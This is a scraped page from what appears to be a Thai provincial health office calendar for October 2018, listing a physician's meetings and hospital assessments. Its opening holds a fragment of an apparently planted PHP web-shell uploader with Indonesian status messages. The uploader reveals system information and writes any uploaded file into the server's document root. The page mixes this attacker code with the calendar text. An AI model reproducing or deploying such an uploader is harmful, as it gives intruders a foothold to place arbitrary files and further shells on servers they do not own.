Upload


"; echo "".php_uname()."
"; echo "
"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "sukses upload -> $web/$files"; } else { echo "gagal upload di document root."; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "sukses upload $files di folder ini"; } else { echo "gagal upload"; } } } ?>
กันยายน 2561
  อา พฤ
(35)             01
(36) 02 03 04 05 06 07 08
(37) 09 10 11 12 13 14 15
(38) 16 17 18 19 20 21 22
(39) 23 24 25 26 27 28 29
(40) 30            
พฤศจิกายน 2561
  อา พฤ
(44)         01 02 03
(45) 04 05 06 07 08 09 10
(46) 11 12 13 14 15 16 17
(47) 18 19 20 21 22 23 24
(48) 25 26 27 28 29 30  
นายแพทย์ปฐมพงศ์ ปรุโปร่ง
ตุลาคม 2561

ปฏิทินทั่วไป
อาทิตย์ จันทร์ อังคาร พุธ พฤหัสบดี ศุกร์ เสาร์
  01
02
03
ดูรายการนี้ประชุมร่วมพัฒนาเครือข่ายเมืองสมุนไพรกับกรมฯ และเครือข่ายเกษตรอินทรีย์ ณ ศูนย์แ
04
ดูรายการนี้ประชุมร่วมพัฒนาเครือข่ายเมืองสมุนไพรกับกรมฯ และเครือข่ายเกษตรอินทรีย์ ณ ศูนย์แ
05
ดูรายการนี้ประชุมสรุปบทเรียนเครือข่ายความปลอดภัยจราจร (สอ.จร.)
06
07 (สัปดาห์ 41)
08
ดูรายการนี้ประชุมจัดทำแผน สสจ.อำนาจเจริญ ณ ภูสิงห์ อ.เมือง จ.อำนาจเจริญ
09
ดูรายการนี้ประชุมจัดทำแผน สสจ.อำนาจเจริญ ณ ภูสิงห์ อ.เมือง จ.อำนาจเจริญ
10
ดูรายการนี้9» นัดหารือปัญหาบริการข้อมูลเขตเทศบาลเมือง ณ รพ.อำนาจเจริญ
ดูรายการนี้13:30» นัดหารือหัวหน้า ปภ.โครงการป้องกันอุบัติเหตุจราจร ณ ศาลากลางจังหวัด อจ.
11
12
13
14 (สัปดาห์ 42)
15
16
17
ดูรายการนี้รับประเมิน HA รพ.พนา ณ รพ.พนา อ.พนา จ.อำนาจเจริญ
ดูรายการนี้รับประเมิน HA รพ.พนา ณ รพ.พนา อ.พนา จ.อำนาจเจริญ
18
19
20
21 (สัปดาห์ 43)
22
ดูรายการนี้13:30» ประชุมกรรมการ NCD ณ ห้องประชุมคณาพันธ์ สสจ.อำนาจเจริญ
23
24
ดูรายการนี้9» ประชุม VDO Conference 100 ปี หมออนามัย โดยรองปลัดกระทรวงสาธารณสุข นพ.ประพนธ์ ตั
25
ดูรายการนี้โครงการบริหารจัดการอุบัติเหตุถนนอย่างยั่งยืน ณ โรงแรมฝ้ายขิด อ.เมือง
26
ดูรายการนี้9» ประชุมกรรมการปฐมภูมิ ณ ห้องประชุมคณาพันธ์ สสจ.อำนาจเจริญ
27
28 (สัปดาห์ 44)
29
30
31
     [ พิมพ์หน้านี้! ]

 
 

 

Website counter